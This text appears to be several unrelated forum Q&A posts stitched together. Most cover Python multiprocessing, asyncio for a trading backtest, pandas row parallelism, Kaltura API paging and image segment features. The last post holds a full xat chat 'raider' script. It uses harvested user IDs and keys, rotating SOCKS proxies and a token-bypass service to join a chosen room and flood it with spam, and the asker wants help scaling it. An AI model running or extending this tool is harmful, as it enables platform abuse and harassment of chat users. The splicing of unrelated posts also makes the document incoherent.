I have the following code:

import multiprocessing as mp

import awswrangler as wr
import pandas as pd

# pred_path is an S3 prefix defined earlier in the script.
global total_pds
total_pds = []

ksplit = wr.s3.list_objects(pred_path)
ksplit = list(ksplit)

def process(x):
    dk = wr.s3.read_parquet(path=pred_path + x, dataset=False)
    return dk

def log_result(result):
    print(len(total_pds), end=' ')
    total_pds.append(result)

def error_back(error):
    print('error', error)

pool = mp.Pool(processes=4, maxtasksperchild=10)
dcms_info = [pool.apply_async(process, args=(spl,), callback=log_result, error_callback=error_back) for spl in ksplit]
for x in dcms_info:
    x.wait()
pool.close()
pool.join()

dataset = pd.concat(total_pds, ignore_index=True)
The last element throws this error:

error("'i' format requires -2147483648 <= number <= 2147483647")
Thank you
I want to run the runBacktest() function asynchronously. Is this possible?
import pandas as pd
from pathlib import Path
from datetime import datetime
from indicators import *

# Load the files.
dfCryptoCap = pd.read_csv(Path(__file__).parent.resolve() / "CRYPTOCAP_TOTAL, 720_b2571.csv")
dfBtcUsd = pd.read_csv(Path(__file__).parent.resolve() / "INDEX_BTCUSD, 720_17561.csv")

# Add a column with the unix timestamp converted to datetime.
dfCryptoCap['timeiso'] = pd.to_datetime(dfCryptoCap['time'], unit='s')
dfBtcUsd['timeiso'] = pd.to_datetime(dfBtcUsd['time'], unit='s')

dfCryptoCapHA = generateHeikinAshi(dfCryptoCap)
dfBtcUsdHA = generateHeikinAshi(dfBtcUsd)

results = []

def runBacktest(lenSmooth1, winningLenSmooth1, winningPNL):
    dfCryptoCapEMA = dfCryptoCapHA.copy()
    dfCryptoCapEMA['open'] = calculateEMA(dfCryptoCapHA['open'], lenSmooth1)
    dfCryptoCapEMA['high'] = calculateEMA(dfCryptoCapHA['high'], lenSmooth1)
    dfCryptoCapEMA['low'] = calculateEMA(dfCryptoCapHA['low'], lenSmooth1)
    dfCryptoCapEMA['close'] = calculateEMA(dfCryptoCapHA['close'], lenSmooth1)
    # print(dfCryptoCapSMA1)

    portfoliosize = 1000
    entryPrice = 0.0
    traderesult = 0.0
    for i in range(1, len(dfCryptoCapEMA)):
        if dfCryptoCapEMA.iloc[i]['close'] > dfCryptoCapEMA.iloc[i]['open'] and dfCryptoCapEMA.iloc[i - 1]['close'] <= dfCryptoCapEMA.iloc[i - 1]['open']:
            btcOHLC = dfBtcUsd.loc[dfBtcUsd['time'] == dfCryptoCapEMA.iloc[i]['time']]
            entryPrice = btcOHLC.iloc[0]['close'].tolist()
        elif dfCryptoCapEMA.iloc[i]['close'] < dfCryptoCapEMA.iloc[i]['open'] and dfCryptoCapEMA.iloc[i - 1]['close'] >= dfCryptoCapEMA.iloc[i - 1]['open']:
            btcOHLC = dfBtcUsd.loc[dfBtcUsd['time'] == dfCryptoCapEMA.iloc[i]['time']]
            try:
                traderesult = (btcOHLC.iloc[0]['close'].tolist() - entryPrice) / entryPrice * 100
            except ZeroDivisionError:  # no position entered yet
                traderesult = 0
            if traderesult > 0:
                portfoliosize = portfoliosize * (1 + (traderesult / 100))
            elif traderesult < 0:
                portfoliosize = portfoliosize * (1 - (abs(traderesult) / 100))

    result = f"Round - lenSmooth1 = {lenSmooth1} | PNL = {round(portfoliosize, 2)} || currentWinner = {winningLenSmooth1} | currentWinnerPNL = {round(winningPNL, 2)}"
    # print(result)
    if portfoliosize > winningPNL:
        results.append(result)
        winningPNL = portfoliosize
        winningLenSmooth1 = lenSmooth1
    return [winningLenSmooth1, winningPNL]

result = []
for x in range(1, 151, 1):
    if x == 1:
        result = runBacktest(x, 0, 0)
    else:
        result = runBacktest(x, result[0], result[1])
print(results[len(results) - 1])
Currently, the backtest runs synchronously, and with larger datasets each iteration takes up to a minute. I want to speed up the process by running runBacktest() asynchronously with different lenSmooth1 values and reviewing the results at the end.
I tried adding the following to my script, but I don't see any improvement in duration:
import asyncio

async def run_tasks():
    tasks = [runBacktest(x, 0, 0) for x in range(1, 151, 1)]
    # await asyncio.wait(tasks)
    await asyncio.gather(*tasks)

def main():
    loop = asyncio.new_event_loop()
    asyncio.set_event_loop(loop)
    loop.run_until_complete(run_tasks())
    loop.close()

main()
print(results)
Async will improve performance when you are working with I/O-bound operations (e.g. waiting for a response over a network, loading a file, etc.), but it won't do much to help with CPU-bound processes: your backtest is pure computation, so an event loop still runs every call one after another on a single core.
This article does a great job of breaking down the different means of achieving concurrency in Python. What you're looking for is likely an implementation of the multiprocessing library.
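As a rough sketch of that direction (my own illustration, untested): make each backtest call independent and let it return its result, then fan the lenSmooth1 values out over a pool of processes. backtestOnce here is a hypothetical function holding the loop body of runBacktest, minus the global results bookkeeping, since worker processes don't share globals with the parent:

import multiprocessing as mp

def backtestOnce(lenSmooth1):
    # Hypothetical refactor of runBacktest: run the EMA/entry/exit loop
    # for one lenSmooth1 and return the final portfolio size, without
    # touching any globals.
    ...

def worker(lenSmooth1):
    return lenSmooth1, backtestOnce(lenSmooth1)

if __name__ == '__main__':
    with mp.Pool(processes=mp.cpu_count()) as pool:
        all_results = pool.map(worker, range(1, 151))
    # Pick the winner once at the end instead of threading the current
    # best through every call.
    winningLenSmooth1, winningPNL = max(all_results, key=lambda r: r[1])
    print(winningLenSmooth1, round(winningPNL, 2))

Depending on the start method, each worker process may re-import the module, so the CSV loading at the top of the script can run once per worker; keep that in mind when measuring the speedup.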
I am trying to use multiprocessing to speed up my data processing. I am working on a machine with 6 cores, so I want to iterate through a table of 12 million rows, and for each of those rows I iterate through several time steps, doing a calculation (executing a function).
This is the line I would like to split up so that it runs in parallel on different cores:

test = [rowiteration(i, output, ini_cols, cols) for i in a]  # this should run in parallel
I tried something with
from multiprocessing import Pool
but I did not manage to pass the function's arguments along with the iterator.
I would appreciate any ideas. I am new to Python.
This is what I have:
import os
import pyreadr
import pandas as pd
import numpy as np
import time
from datetime import timedelta
import functools
from pathlib import Path

def read_data():
    current_path = os.getcwd()
    myfile = os.path.join(str(Path(current_path).parents[0]), 'dummy.RData')
    result = pyreadr.read_r(myfile)
    pc = result["pc"]
    u = result["u"]
    return pc, u

# add one column per time step
def prepare_output_structure(pc):
    ini_cols = pc.columns
    pc = pc.reindex(columns=[*pc.columns, *np.arange(0, 11), 'cat'], fill_value=0)
    pc.reset_index(level=0, inplace=True)
    # print(pc.columns, pc.shape, pc.dtypes)
    return pc, ini_cols

def conjunction(*conditions):
    return functools.reduce(np.logical_and, conditions)

def timeloop(t_final: int, count_final: int, tipo):
    if tipo == 'A':
        count_ini = 35
    else:  # 'B'
        count_ini = 30
    yy_list = []
    for t in np.arange(0, 11):
        yy = ((count_final - count_ini) / t_final) * t + count_ini
        yy_list.append(int(yy))
    return yy_list

def rowiteration(i, output, ini_cols, cols):
    c_2: bool = pc.loc[i, 'tipo'] == u.iloc[:, 0].str[:1]  # first character of category, e.g. 'A1'
    c_5: bool = pc.loc[i, 't_final'] >= u.iloc[:, 1]  # t_min (u)
    c_6: bool = pc.loc[i, 't_final'] <= (u.iloc[:, 2])  # t_max (u)
    pc.loc[i, 'cat'] = u[conjunction(c_2, c_5, c_6)].iloc[0, 0]
    pc.iloc[i, (0 + (len(ini_cols))+1):(10 + (len(ini_cols))+2)] = timeloop(int(pc.loc[i, 't_final']), int(pc.loc[i, 'count_final']), pc.loc[i, 'tipo'])
    out = pd.DataFrame(pc.iloc[i, :])
    out = pd.DataFrame(out.transpose(), columns=cols)
    output = output.append(out.iloc[0, :])
    return output

if __name__ == '__main__':
    start_time = time.time()
    pc, u = read_data()
    nrowpc = len(pc.index)
    a = np.arange(0, nrowpc)  # rows of table pc
    # print(a, nrowpc, len(pc.index))
    pc, ini_cols = prepare_output_structure(pc)
    cols = pc.columns
    output = pd.DataFrame()

    test = [rowiteration(i, output, ini_cols, cols) for i in a]  # this should run in parallel

    pc2 = pd.concat(test, ignore_index=True)
    pc2 = pc2.iloc[:, np.r_[5, (len(ini_cols)+1):(len(pc2.columns))]]
    print(pc2.head)

    elapsed_time_secs = time.time() - start_time
    msg = "Execution took: %s secs (Wall clock time)" % timedelta(seconds=elapsed_time_secs)
    print(msg)
Replace your [rowiteration(i, output, ini_cols, cols) for i in a] with:

from multiprocessing import Pool

n_cpu = 10  # set this to the number of CPU threads available

with Pool(processes=n_cpu) as pool:
    ret = pool.starmap(rowiteration,
                       [(i, output, ini_cols, cols) for i in a])
Here is an approach that I think solves the problem and only sends what is necessary to the worker processes. I haven't tested this as-is (which would be difficult without the data your code reads in), but this is the basic idea:

import multiprocessing as mp

# Note that you already define the static cols and ini_cols
# in global scope, so you don't need to pass them to the Pool.

# ... Other functions you've defined ...

def rowiteration(row):
    c_2: bool = row['tipo'] == u.iloc[:, 0].str[:1]
    c_5: bool = row['t_final'] >= u.iloc[:, 1]
    c_6: bool = row['t_final'] <= (u.iloc[:, 2])
    row['cat'] = u[conjunction(c_2, c_5, c_6)].iloc[0, 0]
    row[(0 + (len(ini_cols))+1):(10 + (len(ini_cols))+2)] = timeloop(int(row['t_final']), int(row['count_final']), row['tipo'])
    return row

p = mp.Pool(processes=mp.cpu_count())

out = []
for row in p.imap_unordered(rowiteration, [r for _, r in pc.iterrows()]):
    row.index = cols
    out.append(row)

pc2 = pd.DataFrame(out).reset_index(drop=True)
I'm unable to retrieve all entries in Kaltura. An ApiException with the message "Unable to generate list. max matches value was reached" (Error: QUERY_EXCEEDED_MAX_MATCHES_ALLOWED) gets triggered.
I tried to work around this issue by setting my session privileges to disableentitlement:
class class_chk_integrity():
    client = None
    pagesize = 0

    def __init__(self, worker_num, progress):
        self.pagesize = 30
        self.worker_num = worker_num
        self.progress = progress
        config = KalturaConfiguration(2723521)
        config.serviceUrl = "https://www.kaltura.com/"
        self.client = KalturaClient(config)
        ks = self.client.session.start("KALTURA_ADMIN_SECRET",
                                       "email@email.com",
                                       KalturaPluginsCore.KalturaSessionType.ADMIN,
                                       "KALTURA_PARTNER_ID",
                                       432000,
                                       "disableentitlement")
        self.client.setKs(ks)
I also tried to filter based on the entry ids. However, I can't get filter.idNotIn to work properly.
def get_total_reg(self, cont, lastEntryIds, lastEntryCreatedAt):
    filter = KalturaPluginsCore.KalturaBaseEntryFilter()
    if lastEntryIds != "":
        filter.idNotIn = lastEntryIds
    filter.orderBy = KalturaBaseEntryOrderBy.CREATED_AT_DESC
    pager = KalturaPluginsCore.KalturaFilterPager()
    pageIndex = 1
    entriesGot = 0
    pager.pageSize = self.pagesize
    pager.pageIndex = pageIndex
    result = self.client.baseEntry.list(filter, pager)
    totalCount = result.totalCount
    if totalCount > 10000:
        totalCount = 9970
    if totalCount <= 0:
        cont = False
    while entriesGot < totalCount:
        pager.pageSize = self.pagesize
        pageIndex += 1
        pager.pageIndex = pageIndex
        result = self.client.baseEntry.list(filter, pager)
        entriesGot += len(result.objects)
        for e in result.objects:
            lastEntryIds.append(e.id)
            lastEntryCreatedAt = e.createdAt
    return result.totalCount, self.pagesize, cont, lastEntryIds, lastEntryCreatedAt
This is how I'm calling the functions:
if __name__ == '__main__':
    try:
        log = _ServiceUtils.log()
        log.setup('all', 'integrity')
        cont = True
        lastEntryIds = []
        lastEntryCreatedAt = 0
        while cont is True:
            kmc = class_chk_integrity(0, 0)
            kmc_total_reg, kmc_page_size, cont, lastEntryIds, lastEntryCreatedAt = kmc.get_total_reg(cont, lastEntryIds, lastEntryCreatedAt)
            interval = 10
            max_threads = math.ceil(kmc_total_reg / (interval * kmc_page_size))
            # max_threads = 1
            threads_list = []
            print('TOTAL REG : %s | PAGE_SIZE : %s | INTERVAL : %s | THREADS : %s' % (kmc_total_reg, kmc_page_size, interval, max_threads))
            progress = class_progress_thread(max_threads)
            for index in range(0, max_threads):
                page_ini = index * interval
                page_end = index * interval + interval
                progress.add_worker_progress(index, datetime.now())
                threads_list.append(threading.Thread(target=thread_chk_integrity, args=(index, log, index * interval + 1, index * interval + interval, progress)))
            threads_list.append(threading.Thread(target=thread_output_progress, args=(progress, max_threads)))
            for thread in threads_list:
                thread.start()
            for thread in threads_list:
                thread.join()
            while not progress.stop():
                time.sleep(30)
    except KeyboardInterrupt:
        try:
            sys.exit(0)
        except SystemExit:
            os._exit(0)
I'd appreciate any help with this.
Thank you for your attention.
if totalCount > 10000:
    totalCount = 9970

I'm curious to know why you are changing totalCount this way.
Short answer - paging works as long as the result set is up to 10K.
To work around that, sort the results by creation date (as you did), and when you reach 10K, start a new search where the created_at date in the filter is the last value you got from the previous search. Reset your paging, of course.
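Sketched out, that could look something like the following (untested; it reuses the names from the code above and assumes the filter's standard createdAtLessThanOrEqual field):

def list_all_entry_ids(client, page_size=500):
    filter = KalturaPluginsCore.KalturaBaseEntryFilter()
    filter.orderBy = KalturaBaseEntryOrderBy.CREATED_AT_DESC
    pager = KalturaPluginsCore.KalturaFilterPager()
    pager.pageSize = page_size

    entry_ids = []
    while True:
        pager.pageIndex = 1
        got_in_window = 0
        last_created_at = None
        while True:
            result = client.baseEntry.list(filter, pager)
            if not result.objects:
                return entry_ids
            for e in result.objects:
                entry_ids.append(e.id)
                last_created_at = e.createdAt
            got_in_window += len(result.objects)
            pager.pageIndex += 1
            # Stay below the 10K window before re-anchoring the search.
            if got_in_window + page_size > 10000:
                break
        # Fresh search anchored at the last createdAt seen, pager reset.
        # Entries created in that same second can show up again, so
        # de-duplicate entry_ids afterwards if that matters.
        filter.createdAtLessThanOrEqual = last_created_at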
I tried to use multiprocessing on this for loop:
def segment_features(segment_pixels):
    features = []
    npixels, nbands = segment_pixels.shape
    for b in range(nbands):
        stats = scipy.stats.describe(segment_pixels[:, b])
        band_stats = list(stats.minmax) + list(stats)[2:]
        if npixels == 1:
            # in this case the variance = nan, change it to 0.0
            band_stats[3] = 0.0
        features += band_stats
    return features

segment_ids = np.unique(segments)
objects = []
object_ids = []
for id in segment_ids:
    segment_pixels = img[segments == id]
    object_features = segment_features(segment_pixels)
    objects.append(object_features)
    object_ids.append(id)
I replaced the for loop section with this:

def segment_features_calc(segment_pixels):
    segment_pixels = img[segments == id]
    object_features = segment_features(segment_pixels)
    objects.append(object_features)
    object_ids.append(id)
    print("segment " + str(id) + " features calculated")

n = mp.cpu_count()

if __name__ == '__main__':
    p = mp.Pool(processes=n)
    start = time.time()
    async_result = p.map_async(segment_features_calc, list(segment_ids))
    p.close()
    p.join()
    print("Complete")
    end = time.time()
    print('total time (s)= ' + str(end - start))
However, the multiprocessing does not get executed properly (it stops after 0.17 seconds, whereas there are 270,000+ segment IDs to loop over). Any insights on how to solve the issue?
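For reference, a hedged sketch of the usual fix for this pattern (my own illustration, untested against this data): have the worker take the segment id and return the features, instead of appending to the global objects/object_ids lists, which child processes cannot update in the parent:

def segment_features_calc(seg_id):
    # Compute and return the features for one segment; results come
    # back through the pool rather than through shared globals.
    segment_pixels = img[segments == seg_id]
    return seg_id, segment_features(segment_pixels)

if __name__ == '__main__':
    with mp.Pool(processes=mp.cpu_count()) as pool:
        pairs = pool.map(segment_features_calc, list(segment_ids))
    object_ids = [sid for sid, _ in pairs]
    objects = [feats for _, feats in pairs]

This assumes img and segments are visible in the workers (true with the fork start method on Linux; on Windows they would need to be loaded in an initializer or passed explicitly).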
See the code below, "j2".
In the j2 XML, as you can see, Y is set from getY(); that happens for each id+proxy pair (one per thread).
What I want is for it to keep changing id and k2, but to reuse the same Y for only 3 of them. After that, it should grab a new Y and do the same again.
So for example:

<j2 Y="one value" id="3 threads pass through" k="3 threads" ...>

and then after that:

<j2 Y="new Y value, because only 3 ids can pass through one Y" id="same again" k="same again" ...>

This is the j2 in question:

j2 = str('<j2 cb="'+rcv.attrib["c"]+'" Y="'+str(Y[0])+'" l5="'+str(Y[1]).strip()+'" l4="583" l3="463" l2="0" q="1" y="'+rcv.attrib['i']+'" k="'+k+'" k3="0" p="0" c="'+str(info[2])+'" f="0" u="'+str(uid)+'" d0="0" n=" " a="0" h="" v="0" />\0')

The Y value should stay the same while 3 ids pass through it; once 3 have passed, grab a new Y value.
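As a minimal sketch of that bookkeeping (my own illustration, separate from the script below): a small thread-safe wrapper that hands out the same Y three times, then refreshes it. fetch_y is a hypothetical callable standing in for whatever actually produces a new Y:

import threading

class SharedY(object):
    # Hand out the same Y to `uses_per_y` callers, then fetch a new one.
    def __init__(self, fetch_y, uses_per_y=3):
        self.fetch_y = fetch_y
        self.uses_per_y = uses_per_y
        self.lock = threading.Lock()
        self.current = None
        self.uses = 0

    def get(self):
        with self.lock:
            if self.current is None or self.uses >= self.uses_per_y:
                self.current = self.fetch_y()
                self.uses = 0
            self.uses += 1
            return self.current

Each raider thread would call shared_y.get() instead of calling getY directly. Note that getY below takes per-connection arguments, so whether one Y is actually accepted for three different connections is a protocol question; the sketch only covers the reuse-3-times bookkeeping.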
Take a look at this script:
import socket, socks
import xml.etree.ElementTree as tree
import time, random, urllib2
import threading
from itertools import izip

def gB(data, first, last):
    x = len(first)
    begin = data.find(first) + x
    end = data.find(last, begin)
    return data[begin:end]

def isInt(buf):
    try:
        i = int(buf)
        return True
    except:
        return False

def ip(roomname):
    if isInt(roomname):
        room = roomname
    else:
        room = gB(urllib2.urlopen('http://xat.com/'+roomname).read(), 'FlashVars="id=', '&xc=')
    room = int(room)
    x = urllib2.urlopen('http://xat.com/web_gear/chat/ip.htm?'+str(time.time())).read()
    x = tree.fromstring(x)
    xSock = x.attrib['xSock'].split(',')
    rSock = []
    while len(rSock) < 4:
        rSock.append(xSock[len(rSock) * 4 + random.randint(0, 1)])
    return rSock[(room & 96) >> 5], int(10007 + (room % 32)), room

def parseID(auser3):
    auser3 = auser3.split('&')
    userid = auser3[1].split('=')[1]
    k1 = auser3[2].split('=')[1]
    k2 = auser3[3].split('=')[1]
    return [userid, k1, k2]

def getY(au, p0, p1, p2, p3, yi):
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(10)
    sock.connect(("127.0.0.1", 1337))
    sock.send(au+"_"+p0+"_"+p1+"_"+p2+"_"+p3+"_"+yi)
    data = sock.recv(1270)
    parse = data.split("\"")
    sock.close()
    print "Y => "+parse[1]+" L5 => "+parse[3]
    return [parse[1], parse[3]]

def raider(a3, p):
    info = ip(chat)
    try:
        socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, p[0], int(p[1]))
        socket.test = socks.socksocket
        xat = socket.test(socket.AF_INET, socket.SOCK_STREAM, socket.SOL_TCP)
        xat.settimeout(10)
        xat.connect((info[0], int(info[1])))
        xat.send('<y r="'+str(info[2])+'" />\0')
        bypass = xat.recv(1024)
        print "\nRecv --> "+bypass+"\n"
        rcv = tree.fromstring(bypass.strip("\0"))
        if 'i' not in rcv.attrib:
            raise Exception("YUP")
        import pprint
        pprint.pprint(a3)
        uid = a3[0]
        k = a3[1]
        if 'au' in rcv.attrib:
            Y = getY(rcv.attrib["au"], rcv.attrib["p"].split("_")[0], rcv.attrib["p"].split("_")[1], rcv.attrib["p"].split("_")[2], rcv.attrib["p"].split("_")[3], rcv.attrib["i"])
            j2 = str('<j2 cb="'+rcv.attrib["c"]+'" Y="'+str(Y[0])+'" l5="'+str(Y[1]).strip()+'" l4="583" l3="463" l2="0" q="1" y="'+rcv.attrib['i']+'" k="'+k+'" k3="0" p="0" c="'+str(info[2])+'" f="0" u="'+str(uid)+'" d0="0" n=" " a="0" h="" v="0" />\0')
            xat.send(j2)
            print "\nSend [Bypass] --> "+j2+"\n"
        else:
            Y = getY(str(0), rcv.attrib["p"].split("_")[0], rcv.attrib["p"].split("_")[1], rcv.attrib["p"].split("_")[2], rcv.attrib["p"].split("_")[3], rcv.attrib["i"])
            j2 = str('<j2 cb="'+rcv.attrib["c"]+'" l5="'+str(Y[1]).strip()+'" l4="583" l3="463" l2="0" q="1" y="'+rcv.attrib['i']+'" k="'+k+'" k3="0" p="0" c="'+str(info[2])+'" f="0" u="'+str(uid)+'" d0="0" n=" " a="0" h="" v="0" />\0')
            xat.send(j2)
            print "\nSend --> "+j2+"\n"
        while 1:
            time.sleep(1)
            xat.send('<m t=" | XAT IS CORRUPT | " u="'+uid+'" />\0')
    except:
        pass

chat = raw_input("Chat to raid: ")
ids = [i.strip() for i in open('ids.txt', 'r')]
proxies = [i.strip() for i in open('socks.txt', 'r')]
for (i, j) in izip(ids, proxies):
    i = parseID(i)
    j = j.split(':')
    threading.Thread(target=raider, args=(i, j)).start()